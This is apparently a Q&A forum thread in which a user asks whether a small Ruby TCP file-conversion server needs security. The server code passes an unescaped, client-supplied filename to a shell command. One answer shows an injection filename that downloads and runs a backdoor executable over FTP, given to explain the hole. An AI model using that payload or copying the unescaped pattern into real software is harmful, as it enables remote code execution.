Should I Take Security Measures for a Small, Single-Service Server?

Question

I have some experience with programming, but I have very little experience when it comes to the security of programs. I've written a single-service server in Ruby which runs on a Windows XP computer to be used by a Linux computer in the same lab. The lab network is also behind a firewall, so there might not be a problem there, but I really have no idea. Below is the code for the server. All it does is take a .raw file, runs msconvert.exe to convert it into an mzML file, and then sends back the mzML file.

require 'socket'

server = TCPServer.open(2000)
loop {
  client = server.accept

  filename = client.gets.chomp
  puts "Reading contents of #{filename}.raw"
  raw_data = client.gets("\r\r\n\n").chomp("\r\r\n\n")
  File.open(filename + ".raw", 'wb') {|out| out.print raw_data}
  puts "Converting #{filename}"

  #It's lame to have a script run a script, but it's the only way to get this to work.
  system "scriptit.bat " + filename + ".raw"

  puts "Sending contents of #{filename}.mzML"
  client.print IO.read(filename + ".mzML")
  client.print "\r\r\n\n"
  puts "Done"
  client.close # Disconnect from the client
}

Should I do something to make this more secure, or do I not need to worry about it?

Answer 1

If the system is exposed to anything public (the internet, etc.) then security is very important. Some people really enjoy the challenge of breaking systems.

Answer 2

If an attacker supples a filename of || ftp ftp://host/backdoor.exe || backdoor.exe || he will be able to infect your server.

In order to patch this server you need to use Escape.shell_command().

Answer 3

Well, if your Windows server is only used by your lab computers, I would say it is sufficient if you configure the firewall so that nobody can access the server from the outside.